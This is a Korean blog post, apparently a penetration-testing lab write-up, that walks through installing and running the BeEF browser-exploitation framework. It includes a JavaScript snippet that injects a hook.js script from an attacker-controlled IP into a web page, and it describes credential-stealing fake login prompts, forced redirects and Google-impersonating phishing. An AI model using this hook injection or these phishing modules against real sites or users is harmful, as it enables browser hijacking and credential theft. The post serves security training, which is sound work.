쟝이의 세상
BeEF를 활용하여 모의해킹 본문
📌 BeEF
: 웹 브라우저의 보안 취약점을 테스트하고 활용하기 위해 만들어진 침투 테스트 도구
→ 웹 애플리케이션 보안 취약점을 파악하는 데 효과적
📎 주요 기능
1) 브라우저 후킹 (Hooking)
: 사용자가 악성 스크립트가 포함된 웹페이지를 열면 브라우저가 BeEF 서버에 연결
2) 모듈 기반 공격
- 리다이렉션: 사용자를 임의의 웹페지로 강제로 이동시킴
- 브라우저 정보 수집: 사용자의 브라우저 버전, 운영체제, IP 주소 등 기본 정보 탐지
- 피싱: 로그인 페이지를 위조해 피해자의 인증 정보 수집 가능
- XSS, 클릭재킹 테스트: 웹 사이트가 공격에 얼마나 취약한지 확인
3) 실시간 제어 및 명령 실행
: 후킹된 브라우저에서 실시간으로 명령을 실행할 수 있으며,사용자가 무엇을 클릭하는지 추적하거나 화면을 캡쳐하는 것도 가능
✔️ BeEF 설치
sudo apt-get install beef-xss
✔️ BeEF 실행
cd /usr/share/beef-xss
sudo ./beef
⚠️ 오류 발생
더보기
└─$ sudo ./beef
[16:42:09][!] ERROR: Don't use default username and password!
[16:42:09] |_ Change the beef.credentials.passwd in /etc/beef-xss/config.yaml
/etc/beef-xss/config.yaml 파일의 비밀번호 값을 수정해줘야 함!
vi /etc/beef-xss/config.yaml
아래의 초기 비밀번호 값을 변경해준 후
sudo ./beef
실행해주기
📌 웹 취약점 공격 시도
✔️ 웹 페이지에 스크립트 삽입
var script = document.createElement('script');
script.src = 'http://192.168.133.138:3000/hook.js';
document.head.appendChild(script);
→ BeEF 서버와 웹 브라우저 간 연결 시도가 가능
👇🏻 웹에 스크립트 실행 화면
👇🏻 BeEF 서버 연결 화면
✔️ Pretty Theft - 사용자의 아이디와 비밀번호 훔치기
사용자에게 SNS 인증을 다시하라는 메시지 발생 → 가짜 로그인 페이지를 보여주어 사용자가 입력하는 값을 그대로 가져온다.
사용자가 입력한 값을 그대로 받아오는 것을 볼 수 있다.
✔️ Redirect Browser - 특정 URL로 리다이렉트
redirect URL에 http://google.com을 입력하였을 때 내가 만든 사이트로 들어가면 구글로 리다이렉트 되는 것을 확인할 수 있다.
결과에 구글로 리다리렉트 된 것을 확인할 수 있다.
✔️ Google Phishing - Google을 사칭하여 사용자로부터 민감한 정보를 수집하는 사이버 공격
도메인 주소를 보면 주소 자체는 내가 만든 웹 페이지의 주소이지만, 사용자의 정보를 수집하기 위해 구글을 사칭한 것이다.
입력한 값은 그대로 전달이 되는 것을 확인할 수 있다.
'자료' 카테고리의 다른 글
CSRF 취약점 모의해킹 (0) | 2024.10.29 |
---|---|
Metasploit을 활용하여 모의해킹 (0) | 2024.10.25 |
AWS에서 EC2 인스턴스 배포 과정 (0) | 2024.10.17 |
웹 게시판 소스코드를 POD로 Deployment (0) | 2024.10.15 |
SQLMap을 활용하여 모의해킹 (0) | 2024.10.15 |